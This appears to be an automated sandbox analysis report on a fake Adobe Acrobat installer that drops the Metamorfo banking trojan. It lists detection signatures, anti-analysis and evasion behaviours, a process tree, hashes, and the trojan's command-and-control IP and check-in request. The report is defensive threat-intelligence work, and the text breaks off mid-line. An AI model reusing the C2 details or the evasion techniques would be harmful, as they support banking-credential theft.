Edit tour

Windows Analysis Report
Adobe_Acrobate_Reader_Pro-HAv70.msi

Overview

General Information

Sample name:	Adobe_Acrobate_Reader_Pro-HAv70.msi
Analysis ID:	1357123
MD5:	9175fed68d5d38dee94bbd059f9ed69a
SHA1:	cb094b6eb86a9fb8c8bcb5a3a7567cc72858eaaa
SHA256:	d8fc4f696f4bd1899ed92d8e9767646308c941cac2ea826dbdd3e64f6926db3d
Tags:	msi
Infos:

Detection

Metamorfo

Score:	96
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for dropped file

Snort IDS alert for network traffic

Yara detected Metamorfo

Hides threads from debuggers

May use the Tor software to hide its network traffic

Overwrites code with function prologues

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

PE file contains section with special chars

Query firmware table information (likely to detect VMs)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to evade analysis by execution special instruction (VM detection)

Checks for available system drives (often done to infect USB drives)

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to call native functions

Contains functionality to query CPU information (cpuid)

Creates files inside the system directory

Deletes files inside the Windows folder

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Entry point lies outside standard sections

Found dropped PE file which has not been started or loaded

Internet Provider seen in connection with other malware

Launches processes in debugging mode, may be used to hinder debugging

PE file contains executable resources (Code or Archives)

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Tries to load missing DLLs

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

msiexec.exe (PID: 5320 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\Adobe_Acrobate_Reader_Pro-HAv70.msi" MD5: E5DA170027542E25EDE42FC54C929077)

msiexec.exe (PID: 2564 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)

msiexec.exe (PID: 6476 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 8E3B84DC866BDAAB5E29174467276D64 MD5: 9D09DC1EDA745A5F87553048E57620CF)

Adobe Acrobat Pro.exe (PID: 6764 cmdline: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe MD5: 48D732A19514BEF06ACC712F43FA7D65)

Adobe Acrobat Pro.exe (PID: 3156 cmdline: "C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe" MD5: 48D732A19514BEF06ACC712F43FA7D65)

Adobe Acrobat Pro.exe (PID: 3328 cmdline: "C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe" MD5: 48D732A19514BEF06ACC712F43FA7D65)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Metamorfo	According to BitDefender, Metamorfo is a family of banker Trojans that has been active since mid-2018. It primarily targets Brazilians and is delivered mostly through Office files rigged with macros in spam attachments. Metamorfo is a potent piece of malware, whose primary capability is theft of banking information and other personal data from the user and exfiltration of it to the C2 server.	No Attribution	https://blog.ensilo.com/metamorfo-avast-abuser https://blog.talosintelligence.com/2018/11/metamorfo-brazilian-campaigns.html https://cofense.com/blog/autohotkey-banking-trojan/ https://github.com/jeFF0Falltrades/IoCs/blob/master/Broadbased/metamorfo.md https://medium.com/@chenerlich/the-avast-abuser-metamorfo-banking-malware-hides-by-abusing-avast-executable-ac9b8b392767	https://malpedia.caad.fkie.fraunhofer.de/details/win.metamorfo

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Metamorfo	Yara detected Metamorfo	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000003.00000000.1681304324.0000000000401000.00000020.00000001.01000000.00000003.sdmp	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security

Snort Signatures

ETPRO TROJAN Win32/Metamorfo CnC Checkin - Source IP: 192.168.2.4 - Destination IP: 185.228.72.212

Timestamp:	192.168.2.4185.228.72.21249734802833187 12/10/23-03:11:38.566092
SID:	2833187
Source Port:	49734
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\avutil.dll	ReversingLabs: Detection: 43%
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\avutil.dll	Virustotal: Detection: 49%			Perma Link

Source: Adobe Acrobat Pro.exe, 00000003.00000000.1681304324.0000000000E01000.00000020.00000001.01000000.00000003.sdmp

Binary or memory string: -----BEGIN RSA PUBLIC KEY-----

memstr_0b826bbf-e

Source:	Binary string: r:\Case\Projects\sly\AnyDVDhd\AnyTool\Release\AnyTool.pdb$ source: Adobe Acrobat Pro.exe, 00000003.00000000.1686559103.000000000181D000.00000002.00000001.01000000.00000003.sdmp
Source:	Binary string: r:\Case\Projects\sly\AnyDVDhd\AnyTool\Release\AnyTool.pdb source: Adobe Acrobat Pro.exe, 00000003.00000000.1686559103.000000000181D000.00000002.00000001.01000000.00000003.sdmp
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: Adobe_Acrobate_Reader_Pro-HAv70.msi, MSIDF32.tmp.1.dr, 64d7bc.msi.1.dr

Source: C:\Windows\System32\msiexec.exe	File opened: z:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: x:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: v:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: t:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: r:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: p:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: n:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: l:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: j:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: h:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: f:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: b:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: y:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: w:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: u:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: s:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: q:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: o:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: m:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: k:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: i:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: g:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: e:	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Adobe Acrobat Reader\Adobe Acrobat Reader\Adobe Acrobat Reader\x64\Reader-pdf\Adobe Acrobat Pro.exe	File opened: c:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: a:	Jump to behavior

Networking

Snort IDS alert for network traffic

Source: Traffic

Snort IDS: 2833187 ETPRO TROJAN Win32/Metamorfo CnC Checkin 192.168.2.4:49734 -> 185.228.72.212:80

Source: Joe Sandbox View

ASN Name: RACKMARKTES RACKMARKTES

Source: global traffic

HTTP traffic detected: POST /contador/serv.php HTTP/1.0Connection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 141Host: 185.228.72.212Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8User-Agent: Mozilla/3.0 (compatible; Indy Library)

Source: unknown	TCP traffic detected without corresponding DNS query: 185.228.72.212
Source: unknown	TCP traffic detected without corresponding DNS query: 185.228.72.212
Source: unknown	TCP traffic detected without corresponding DNS query: 185.228.72.212
Source: unknown	TCP traffic detected without corresponding DNS query: 185.228.72.212
Source: unknown	TCP traffic detected without corresponding DNS query: 185.228.72.212
Source: unknown	TCP traffic detected without corresponding DNS query: 185.228.72.212

Source: unknown

Source: Adobe Acrobat Pro.exe, 00000003.00000000.1686559103.000000000181D000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://art.gnome.org/2
Source: Adobe Acrobat Pro.exe, 00000003.00000000.1686559103.000000000181D000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://code.google.com/p/gnome-colors/P
Source: Adobe Acrobat Pro.exe, 00000003.00000000.1686559103.000000000181D000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://commons.wikimedia.org/wiki/Crystal_Clear
Source: Adobe Acrobat Pro.exe, 00000003.00000000.1686559103.000000000181D000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://creativecommons.org/licenses/GPL/2.0/lj
Source: Adobe Acrobat Pro.exe, 00000003.00000000.1686559103.000000000181D000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://creativecommons.org/licenses/GPL/3.0/
Source: Adobe Acrobat Pro.exe, 00000003.00000000.1686559103.000000000181D000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://creativecommons.org/licenses/LGPL/2.1/
Source: Adobe Acrobat Pro.exe, 00000003.00000000.1686559103.000000000181D000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://creativecommons.org/licenses/LGPL/2.1/;
Source: Adobe Acrobat Pro.exe, 00000003.00000000.1686559103.000000000181D000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://creativecommons.org/licenses/by-sa/3.0/
Source: Adobe Acrobat Pro.exe, 00000008.00000002.2516632097.00000000074AD000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000008.00000002.2524616562.000000000750A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://en.wikiped
Source: Adobe Acrobat Pro.exe, 00000003.00000000.1686559103.000000000181D000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://everaldo.com/crystal/
Source: Adobe Acrobat Pro.exe, 00000003.00000000.1686559103.000000000181D000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://fontawesome.io
Source: Adobe Acrobat Pro.exe, 00000003.00000000.1686559103.000000000181D000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://fontawesome.io/license/
Source: Adobe Acrobat Pro.exe, 00000003.00000000.1686559103.000000000181D000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://fontawesome.iohttp://fontawesome.iohttp://fontawesome.io/license/http://fontawesome.io/licens
Source: Adobe Acrobat Pro.exe, 00000003.00000003.1743221642.00000000FFDD0000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000007.00000002.2414712117.0000000007448000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000008.00000002.2516632097.0000000007451000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://fontfabrik.com
Source: Adobe Acrobat Pro.exe, 00000003.00000000.1686559103.000000000181D000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://forums.vso-software.fr/advanced-text-customization-in-dvd-menus-
Source: Adobe Acrobat Pro.exe, 00000003.00000000.1681304324.00000000015CA000.00000020.00000001.01000000.00000003.sdmp	String found in binary or memory: http://forums.vso-software.fr/convertxtodvd-batcher-beta-t19034.html
Source: Adobe Acrobat Pro.exe, 00000003.00000000.1681304324.0000000000E01000.00000020.00000001.01000000.00000003.sdmp	String found in binary or memory: http://forums.vso-software.fr/convertxtodvd-batcher-t19034.htmlU
Source: Adobe Acrobat Pro.exe, 00000003.00000000.1686559103.000000000181D000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://fr.vso-software.fr/support.php
Source: Adobe Acrobat Pro.exe, 00000003.00000000.1686559103.0000000001E93000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://jvcl.delphi-jedi.org/
Source: Adobe Acrobat Pro.exe, 00000003.00000000.1686559103.000000000181D000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://nuovext.pwsp.net
Source: Adobe Acrobat Pro.exe, 00000003.00000000.1686559103.0000000001E93000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://packages.debian.org/lenny/app-install-data
Source: Adobe Acrobat Pro.exe, 00000003.00000000.1681304324.0000000000401000.00000020.00000001.01000000.00000003.sdmp	String found in binary or memory: http://rg.vso-software.fr
Source: Adobe Acrobat Pro.exe, 00000003.00000000.1681304324.0000000000401000.00000020.00000001.01000000.00000003.sdmp	String found in binary or memory: http://secure.vso-software.fr/?m=tsU
Source: Adobe Acrobat Pro.exe, 00000003.00000000.1686559103.0000000001E93000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://svn.vso-software.fr/listing.php?repname=ffmpeg&path=%2Ftrunk%2F#_trunk_
Source: Adobe Acrobat Pro.exe, 00000003.00000000.1681304324.0000000000401000.00000020.00000001.01000000.00000003.sdmp	String found in binary or memory: http://vso-software.fr/download.phpU
Source: Adobe Acrobat Pro.exe, 00000003.00000000.1681304324.0000000000401000.00000020.00000001.01000000.00000003.sdmp	String found in binary or memory: http://vso-software.fr/products.phpU
Source: Adobe Acrobat Pro.exe, 00000003.00000003.1746631092.00000000FFD40000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000007.00000002.2421525968.0000000007550000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: Adobe Acrobat Pro.exe, 00000003.00000003.1743919963.00000000FFDD0000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000007.00000002.2405981058.00000000024ED000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000008.00000002.2483552057.00000000023AD000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.ascendercorp.com/typedesigners.html
Source: Adobe Acrobat Pro.exe, 00000003.00000000.1686559103.000000000181D000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://www.baua.de/nn_56926/de/Themen-von-A-Z/Arbeitsstaetten/ASR/pdf/ASR-A1-3.pdfjc
Source: Adobe Acrobat Pro.exe, 00000003.00000003.1746631092.00000000FFD40000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000007.00000002.2421525968.000000000756F000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000008.00000002.2524616562.0000000007571000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.com
Source: Adobe Acrobat Pro.exe, 00000003.00000000.1686559103.0000000001E93000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://www.delphi-jedi.org
Source: Adobe Acrobat Pro.exe, 00000003.00000000.1686559103.0000000001E93000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://www.ffmpeg.org
Source: Adobe Acrobat Pro.exe, 00000003.00000003.1743919963.00000000FFDD0000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000003.00000003.1746631092.00000000FFD40000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000003.00000003.1746318172.00000000FFCFE000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000003.00000003.1744153228.00000000FFE00000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000003.00000003.1743709263.00000000FFD40000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000003.00000003.1746318172.00000000FFC00000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000003.00000003.1743221642.00000000FFDD0000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000007.00000002.2421525968.000000000756F000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000007.00000002.2414712117.0000000007495000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000007.00000002.2405981058.00000000024ED000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000007.00000003.2094547921.00000000FFC30000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000007.00000002.2421525968.00000000075BD000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000008.00000002.2483552057.00000000023AD000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000008.00000002.2524616562.0000000007571000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000008.00000002.2516632097.000000000749F000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000008.00000002.2524616562.00000000075D5000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: Adobe Acrobat Pro.exe, 00000003.00000003.1743919963.00000000FFDD0000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000003.00000003.1746631092.00000000FFD40000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000003.00000003.1746318172.00000000FFCFE000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000003.00000003.1743709263.00000000FFD40000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000003.00000003.1746318172.00000000FFC00000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000003.00000003.1743221642.00000000FFDD0000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000007.00000002.2421525968.000000000756F000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000007.00000003.2094547921.00000000FFC30000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: Adobe Acrobat Pro.exe, 00000003.00000003.1743221642.00000000FFDD0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/
Source: Adobe Acrobat Pro.exe, 00000008.00000002.2483552057.00000000023AD000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/03
Source: Adobe Acrobat Pro.exe, 00000007.00000002.2405981058.00000000024ED000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/03P
Source: Adobe Acrobat Pro.exe, 00000003.00000003.1744153228.00000000FFE00000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000007.00000002.2414712117.00000000073A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.html
Source: Adobe Acrobat Pro.exe, 00000003.00000003.1743919963.00000000FFDD0000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000007.00000002.2414712117.00000000073A0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: Adobe Acrobat Pro.exe, 00000008.00000002.2483552057.00000000023AD000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers03
Source: Adobe Acrobat Pro.exe, 00000007.00000002.2405981058.00000000024ED000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers03P
Source: Adobe Acrobat Pro.exe, 00000007.00000002.2414712117.00000000073A0000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000008.00000002.2516632097.00000000073B6000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.comp
Source: Adobe Acrobat Pro.exe, 00000003.00000003.1743221642.00000000FFDD0000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000007.00000002.2414712117.0000000007495000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000008.00000002.2516632097.00000000074AD000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: Adobe Acrobat Pro.exe, 00000003.00000003.1746318172.00000000FFCFE000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000007.00000002.2421525968.00000000075BD000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000008.00000002.2524616562.00000000075D5000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: Adobe Acrobat Pro.exe, 00000003.00000003.1743919963.00000000FFDD0000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000003.00000003.1744153228.00000000FFE00000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/
Source: Adobe Acrobat Pro.exe, 00000007.00000002.2414712117.00000000073A0000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000008.00000002.2516632097.00000000073B6000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/p
Source: Adobe Acrobat Pro.exe, 00000003.00000003.1744153228.00000000FFE00000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/
Source: Adobe Acrobat Pro.exe, 00000007.00000002.2414712117.00000000073A0000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000008.00000002.2516632097.00000000073B6000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/p
Source: Adobe Acrobat Pro.exe, 00000003.00000003.1744153228.00000000FFE00000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000007.00000002.2405981058.00000000024ED000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000008.00000002.2483552057.00000000023AD000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: Adobe Acrobat Pro.exe, 00000003.00000000.1686559103.000000000181D000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://www.gimp.org/S
Source: Adobe Acrobat Pro.exe, 00000003.00000000.1686559103.0000000001E93000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://www.gnu.org/licenses/old-licenses/lgpl-2.1.html
Source: Adobe Acrobat Pro.exe, 00000003.00000003.1744153228.00000000FFE00000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: Adobe Acrobat Pro.exe, 00000007.00000002.2414712117.00000000073A0000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000008.00000002.2516632097.00000000073B6000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.krp
Source: Adobe Acrobat Pro.exe, 00000003.00000000.1686559103.000000000181D000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://www.icon-king.com/projects/nuvola/v=
Source: Adobe Acrobat Pro.exe, 00000003.00000003.1873869776.00000000077E0000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000007.00000003.2230733260.0000000005ED0000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000007.00000002.2427076057.000000001801C000.00000020.00000001.01000000.00000004.sdmp, Adobe Acrobat Pro.exe, 00000007.00000003.2378547349.0000000006080000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000008.00000003.2460055582.0000000005FE0000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000008.00000003.2337696991.0000000006050000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.indyproject.org/
Source: Adobe Acrobat Pro.exe, 00000003.00000003.1746958046.00000000FFD90000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000003.00000003.1747427333.00000000FFE00000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000007.00000002.2421525968.000000000756F000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000007.00000002.2421525968.00000000074E0000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000008.00000002.2524616562.00000000074E0000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000008.00000002.2524616562.0000000007571000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: Adobe Acrobat Pro.exe, 00000003.00000003.1746958046.00000000FFD90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/0
Source: Adobe Acrobat Pro.exe, 00000007.00000002.2421525968.000000000756F000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000008.00000002.2524616562.0000000007571000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/2
Source: Adobe Acrobat Pro.exe, 00000003.00000000.1681304324.00000000015CA000.00000020.00000001.01000000.00000003.sdmp	String found in binary or memory: http://www.lifeboat.jp/products/ctv1/ctv1_buy.html
Source: Adobe Acrobat Pro.exe, 00000003.00000000.1686559103.0000000001E93000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://www.mozilla.org/MPL/MPL-1.1.html
Source: Adobe Acrobat Pro.exe, 00000003.00000000.1686559103.000000000181D000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://www.openoffice.org/
Source: Adobe Acrobat Pro.exe, 00000003.00000000.1686559103.000000000181D000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://www.oxygen-icons.org/
Source: Adobe Acrobat Pro.exe, 00000003.00000003.1743221642.00000000FFDD0000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000007.00000002.2405981058.00000000024ED000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000008.00000002.2483552057.00000000023AD000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: Adobe Acrobat Pro.exe, 00000003.00000003.1746318172.00000000FFCFE000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000007.00000002.2421525968.00000000075BD000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000008.00000002.2524616562.0000000007611000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: Adobe Acrobat Pro.exe, 00000003.00000003.1744153228.00000000FFE00000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: Adobe Acrobat Pro.exe, 00000007.00000002.2414712117.00000000073A0000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000008.00000002.2516632097.00000000073B6000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.krp
Source: Adobe Acrobat Pro.exe, 00000003.00000000.1686559103.0000000001E93000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://www.soft-gems.net
Source: Adobe Acrobat Pro.exe, 00000003.00000000.1686559103.0000000001E93000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://www.soft-gems.net/supplement/download.php?ID=28
Source: Adobe Acrobat Pro.exe, 00000003.00000003.1743919963.00000000FFDD0000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000003.00000003.1746631092.00000000FFD40000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000003.00000003.1746318172.00000000FFCFE000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000003.00000003.1744153228.00000000FFE00000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000003.00000003.1743221642.00000000FFDD0000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000007.00000002.2421525968.000000000750A000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000007.00000002.2414712117.0000000007448000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000007.00000002.2414712117.00000000073E6000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000007.00000002.2421525968.00000000075BD000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000008.00000002.2524616562.0000000007518000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000008.00000002.2516632097.0000000007451000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat Pro.exe, 00000008.00000002.2516632097.00000000073E6000.00000004.00001000.00020000.00000000.sdmp, Adobe Acrobat 